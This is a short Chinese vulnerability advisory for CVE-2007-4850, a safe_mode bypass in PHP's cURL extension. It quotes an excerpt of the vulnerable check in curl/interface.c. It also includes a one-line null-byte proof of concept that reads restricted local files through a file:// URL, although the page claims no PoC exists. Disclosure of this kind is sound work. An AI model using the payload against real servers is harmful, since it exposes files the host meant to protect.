PHP cURL 'safe mode'安全绕过漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

BUGTRAQ ID: 27413 CVE ID:CVE-2007-4850 CNCVE ID:CNCVE-20074850 PHP是一款流行的网络编程语言。 PHP cURL存在'safe mode'安全绕过问题,远程攻击者可以利用漏洞访问受限制文件,获得敏感信息。 var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00&qu ot;.__FILE__))); is caused by error in curl/interface.c - --- #define PHP_CURL_CHECK_OPEN_BASEDIR(str, len, __ret) if (((PG(open_basedir) && *PG(open_basedir)) || PG(safe_mode)) && strncasecmp(str, "file:", sizeof("file:") - 1) == 0) { php_url *tmp_url; if (!(tmp_url = php_url_parse_ex(str, len))) { php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid URL '%s'", str); php_curl_ret(__ret); } if (!php_memnstr(str, tmp_url->path, strlen(tmp_url->path), str + len)) { php_error_docref(NULL TSRMLS_CC, E_WARNING, "URL '%s' contains unencoded control characters", str); php_url_free(tmp_url); php_curl_ret(__ret); } if (tmp_url->query || tmp_url->fragment || php_check_open_basedir(tmp_url->path TSRMLS_CC) ||...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息